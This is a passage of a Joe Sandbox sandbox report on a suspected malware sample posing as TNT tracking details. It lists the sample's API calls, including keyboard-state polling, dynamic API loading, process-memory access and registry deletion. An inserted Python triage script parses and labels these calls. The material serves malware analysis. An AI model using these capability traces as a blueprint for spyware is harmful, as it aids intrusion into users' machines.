                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Process$CloseCountersCurrentHandleOpen
                                      • String ID:
                                      • API String ID: 3488606520-0
                                      • Opcode ID: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                                      • Instruction ID: 747e8e91012d04cc7bcfbda4f2b49d0ca9967bea8b965680eccea6cdbc9dea0c
                                      • Opcode Fuzzy Hash: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                                      • Instruction Fuzzy Hash: 82817170A047029FD310DF65C981B4BBBE1BF84704F10892EF6999B3D2DA75E944CB96
                                      APIs
                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B5B5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: ConnectRegistry_memmove_wcslen
                                      • String ID:
                                      • API String ID: 15295421-0
                                      • Opcode ID: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                      • Instruction ID: 481e56be03c4cee60d8ca92471cfa4b3875eab78bcfcbf7fb961631f720e0f99
                                      • Opcode Fuzzy Hash: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                      • Instruction Fuzzy Hash: 7D515F71208301ABD304EF65C885E5BB7A8FF88704F10892EB54597291D774E945CBA6
                                      APIs
                                      • LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0046485D
                                      • GetProcAddress.KERNEL32(?,?), ref: 004648F7
                                      • GetProcAddress.KERNEL32(?,00000000), ref: 00464916
                                      • GetProcAddress.KERNEL32(?,?), ref: 0046495A
                                      • FreeLibrary.KERNEL32(?,?,?,?), ref: 0046497C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: AddressProc$Library$FreeLoad
                                      • String ID:
                                      • API String ID: 2449869053-0
                                      • Opcode ID: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                      • Instruction ID: 8919579e2c9fc9b2d94c4928dd3202a5bdd7863bc063e44bf2a6fba2f1eed130
                                      • Opcode Fuzzy Hash: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                      • Instruction Fuzzy Hash: 2351BF756002049FCB00EFA4C985A9EB7B4EF88304F14856EFD05AB392DB79ED45CB99
                                      APIs
                                      • GetCursorPos.USER32(?), ref: 004563A6
                                      • ScreenToClient.USER32(?,?), ref: 004563C3
                                      • GetAsyncKeyState.USER32(?), ref: 00456400
                                      • GetAsyncKeyState.USER32(?), ref: 00456410
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00456466
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: AsyncState$ClientCursorLongScreenWindow
                                      • String ID:
                                      • API String ID: 3539004672-0
                                      • Opcode ID: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                      • Instruction ID: 60090bce41a6de58f2ab96a8453d1e3558661e38fd0c916b19f374a884add038
                                      • Opcode Fuzzy Hash: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                      • Instruction Fuzzy Hash: 49414C74504204BBDB24CF65C884EEFBBB8EB46326F60464EFC6593281CB34A944CB68
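The per-function API listings in this section (for instance the OpenProcess call with access mask 00000410 at ref 0047585B, the LoadLibraryW/GetProcAddress/FreeLibrary sequence at 0046485D, the GetAsyncKeyState polling at 00456400, and the AttachThreadInput subcall reached from GetFocus at 0046157B) are the raw material an analyst works through when triaging a report like this one. The Python below is an added example and is not part of the Joe Sandbox report or its IDA plugin: it parses lines in exactly this "APIs" format into per-function records, expands the OpenProcess dwDesiredAccess argument into its documented PROCESS_* rights, and applies a few heuristic labels. The sample input is copied from the entries above; the rules and their wording are the example's own assumptions, not report signatures.

```python
"""Added example (not the report's code): parse Joe Sandbox "APIs" lines and triage them."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# One "APIs" line, direct ("• X.MOD(args), ref: ADDR") or prefixed "Part of subcall function ADDR:".
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)

# PROCESS_* access rights (winnt.h values) used to expand OpenProcess's first argument.
PROCESS_ACCESS = {
    0x0001: "PROCESS_TERMINATE", 0x0002: "PROCESS_CREATE_THREAD", 0x0008: "PROCESS_VM_OPERATION",
    0x0010: "PROCESS_VM_READ", 0x0020: "PROCESS_VM_WRITE", 0x0040: "PROCESS_DUP_HANDLE",
    0x0080: "PROCESS_CREATE_PROCESS", 0x0100: "PROCESS_SET_QUOTA", 0x0200: "PROCESS_SET_INFORMATION",
    0x0400: "PROCESS_QUERY_INFORMATION", 0x0800: "PROCESS_SUSPEND_RESUME",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
}

@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: str                 # call-site address in the sample
    subcall: Optional[str]   # callee address when the line is marked "Part of subcall function"

@dataclass
class FunctionEntry:
    calls: List[ApiCall] = field(default_factory=list)

    @property
    def names(self) -> set:
        return {c.name for c in self.calls}

def parse_listing(text: str) -> List[FunctionEntry]:
    """Split report text into one FunctionEntry per "APIs" block."""
    entries, current = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = FunctionEntry()
            entries.append(current)
            continue
        m = API_LINE.match(line)
        if m and current is not None:
            args = [a for a in (m.group("args") or "").split(",") if a]
            current.calls.append(ApiCall(m.group("name"), m.group("module"), args,
                                         m.group("ref"), m.group("sub")))
        elif line.strip():
            current = None  # "Strings", "Memory Dump Source", ... close the block
    return entries

def decode_process_access(hex_arg: str) -> List[str]:
    """Expand an OpenProcess dwDesiredAccess value into PROCESS_* right names."""
    if hex_arg == "?":
        return ["<unknown>"]
    mask = int(hex_arg, 16)
    names = [n for bit, n in sorted(PROCESS_ACCESS.items()) if mask & bit]
    leftover = mask & ~sum(PROCESS_ACCESS)
    return names + ([f"0x{leftover:X}"] if leftover else [])

def triage(entry: FunctionEntry) -> List[str]:
    """Heuristic labels for one function (the example's assumptions, not report verdicts)."""
    n, findings = entry.names, []
    if n & {"LoadLibraryW", "LoadLibraryA", "LoadLibraryExW"} and "GetProcAddress" in n:
        findings.append("dynamic API resolution (LoadLibrary + GetProcAddress)")
    if n & {"GetAsyncKeyState", "GetKeyState", "GetKeyboardState"}:
        findings.append("polls keyboard state (GetAsyncKeyState)")
    if "AttachThreadInput" in n:
        findings.append("attaches to another thread's input queue (AttachThreadInput)")
    if "RegDeleteKeyW" in n and "RegEnumKeyExW" in n:
        findings.append("recursive registry key deletion (RegEnumKeyExW + RegDeleteKeyW)")
    for c in entry.calls:
        if c.name == "OpenProcess" and c.args:
            findings.append("OpenProcess access: " + "|".join(decode_process_access(c.args[0])))
    return findings

# Constructed sample: four "APIs" blocks copied from the listing above.
SAMPLE = """\
APIs
• OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047585B
• GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047587F
Memory Dump Source
APIs
• LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0046485D
• GetProcAddress.KERNEL32(?,?), ref: 004648F7
• FreeLibrary.KERNEL32(?,?,?,?), ref: 0046497C
Memory Dump Source
APIs
• GetAsyncKeyState.USER32(?), ref: 00456400
Memory Dump Source
APIs
  • Part of subcall function 0043646A: AttachThreadInput.USER32(00000000), ref: 004364AA
• GetFocus.USER32 ref: 0046157B
Memory Dump Source
"""
```

Run `parse_listing(SAMPLE)` and feed each entry to `triage`; the first entry resolves to `OpenProcess access: PROCESS_VM_READ|PROCESS_QUERY_INFORMATION`, which is the minimum right set for reading another process's memory and statistics. The "Part of subcall function" lines are kept in the same entry on purpose: a capability such as AttachThreadInput is reachable from the function even though the call site sits in a callee.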
                                      APIs
                                      • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D438
                                      • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D44D
                                      • Sleep.KERNEL32(0000000A), ref: 0047D455
                                      • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D460
                                      • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D56A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Interlocked$DecrementIncrement$Sleep
                                      • String ID:
                                      • API String ID: 327565842-0
                                      • Opcode ID: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                      • Instruction ID: e00c67d4cb89bf1d5311357fb713975cbca1e0cfcee7190b0451066ade77f289
                                      • Opcode Fuzzy Hash: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                      • Instruction Fuzzy Hash: CC412571A002055FEB10DF65CD84AEE7774EF45304B10852EF609A7351E738EE46CB99
                                      APIs
                                      • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C44F
                                      • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C477
                                      • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C4C3
                                      • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C4E7
                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C4F6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: PrivateProfile$SectionWrite$String
                                      • String ID:
                                      • API String ID: 2832842796-0
                                      • Opcode ID: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                                      • Instruction ID: 1eb5009190fa999c36a74edd43b7bd9b51adbc8f8691a9c3f5840d50e9073e8b
                                      • Opcode Fuzzy Hash: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                                      • Instruction Fuzzy Hash: D1413075A00209BFDB10EFA1DC85FAAB7A8BF44305F10855EF9049B292DA79EE44CB54
                                      APIs
                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00441CA9
                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00441CDD
                                      • RegCloseKey.ADVAPI32(?), ref: 00441CFE
                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00441D6E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Enum$CloseDeleteOpen
                                      • String ID:
                                      • API String ID: 2095303065-0
                                      • Opcode ID: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                      • Instruction ID: 7ca4c7ada97503ad9332fce322fe5d5fc03c2789ff93db080e75f28165cdf273
                                      • Opcode Fuzzy Hash: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                      • Instruction Fuzzy Hash: 69317CB2940108BAEB10DBD4DC85FFEB77CEB49304F04456EF605A7241D774AA858BA8
                                      APIs
                                      • GetWindowRect.USER32(?,?), ref: 00436A24
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: RectWindow
                                      • String ID:
                                      • API String ID: 861336768-0
                                      • Opcode ID: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                      • Instruction ID: 0a42da3bb0701689e96ef39581243ed39d97d4ba46bd7cd8c1f057aae640e0d3
                                      • Opcode Fuzzy Hash: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                      • Instruction Fuzzy Hash: E531EA7160021EAFDB00DF68D988AAE77A5EB49324F11C62AFD24E7380D774EC11CB90
                                      APIs
                                      • SendMessageW.USER32 ref: 00449598
                                        • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                      • SendMessageW.USER32(?,00001074,?,?), ref: 004495F8
                                      • _wcslen.LIBCMT ref: 0044960D
                                      • _wcslen.LIBCMT ref: 0044961A
                                      • SendMessageW.USER32(?,00001074,?,?), ref: 0044964E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: MessageSend$_wcslen$_wcspbrk
                                      • String ID:
                                      • API String ID: 1856069659-0
                                      • Opcode ID: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                      • Instruction ID: 683be220b4a5e9d86ccbf412c3bd2f13dbb60120779f28b1c577ab6eeef24407
                                      • Opcode Fuzzy Hash: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                      • Instruction Fuzzy Hash: 77318F71A00218ABEB20DF59DC80BDFB374FF94314F10466AFA0497280E7B59D958B94
                                      APIs
                                      • GetCursorPos.USER32(?), ref: 004478E2
                                      • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478FC
                                      • DefDlgProcW.USER32(?,0000007B,?,?), ref: 0044791D
                                      • GetCursorPos.USER32(00000000), ref: 0044796A
                                      • TrackPopupMenuEx.USER32(030D6360,00000000,00000000,?,?,00000000), ref: 00447991
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: CursorMenuPopupTrack$Proc
                                      • String ID:
                                      • API String ID: 1300944170-0
                                      • Opcode ID: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                      • Instruction ID: 8079d3ea29232e2d8a780d7c6517a0c600664366e77620ab1eef72d1e193e80f
                                      • Opcode Fuzzy Hash: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                      • Instruction Fuzzy Hash: EF31CF75600108AFE724CF59DC88FABB768EB89310F20455AF94587391C775AC53CBA8
                                      APIs
                                      • GetClientRect.USER32(?,?), ref: 004479CC
                                      • GetCursorPos.USER32(?), ref: 004479D7
                                      • ScreenToClient.USER32(?,?), ref: 004479F3
                                      • WindowFromPoint.USER32(?,?), ref: 00447A34
                                      • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447AAD
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Client$CursorFromPointProcRectScreenWindow
                                      • String ID:
                                      • API String ID: 1822080540-0
                                      • Opcode ID: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                      • Instruction ID: a7e7621e8492875af53c289f1ad187460d50aec5ad556b3834d9a5cb4abdf121
                                      • Opcode Fuzzy Hash: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                      • Instruction Fuzzy Hash: B831A2741082029FE710DF69D884D7FB7A4FB89314F144A1EF850D7291D774E946CBA6
                                      APIs
                                      • GetWindowRect.USER32(?,?), ref: 00447C5D
                                      • ScreenToClient.USER32(?,?), ref: 00447C7B
                                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                      • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                      • EndPaint.USER32(?,?), ref: 00447D13
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: ClientPaintRectRectangleScreenViewportWindow
                                      • String ID:
                                      • API String ID: 659298297-0
                                      • Opcode ID: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                      • Instruction ID: 3c0582d8bc81ba5dadaaf244cb1f1d3939805113443e317e1f98b5bdeebaec33
                                      • Opcode Fuzzy Hash: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                      • Instruction Fuzzy Hash: C33161706043019FE310CF25D8C8F7B7BE8EB86724F144A6EF9A5872A1C774A845DB69
                                      APIs
                                      • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                      • EnableWindow.USER32(?,00000001), ref: 00448B72
                                      • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                      • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                      • EnableWindow.USER32(?,00000001), ref: 00448C09
                                        • Part of subcall function 00440D98: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
                                        • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440DFA
                                        • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440E3A
                                        • Part of subcall function 00440D98: SendMessageW.USER32(030D1B60,000000F1,00000000,00000000), ref: 00440E6E
                                        • Part of subcall function 00440D98: SendMessageW.USER32(030D1B60,000000F1,00000001,00000000), ref: 00440E9A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Window$EnableMessageSend$LongShow
                                      • String ID:
                                      • API String ID: 142311417-0
                                      • Opcode ID: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                      • Instruction ID: c941ec4e4e3d0536419715940b2668e48b64c275bb9f23e9dd6fd7b29375311a
                                      • Opcode Fuzzy Hash: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                      • Instruction Fuzzy Hash: DE21F7B17443805BF7258E24CCC4BAFB7D0EF56345F08482EF98196391DBACA885C75A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
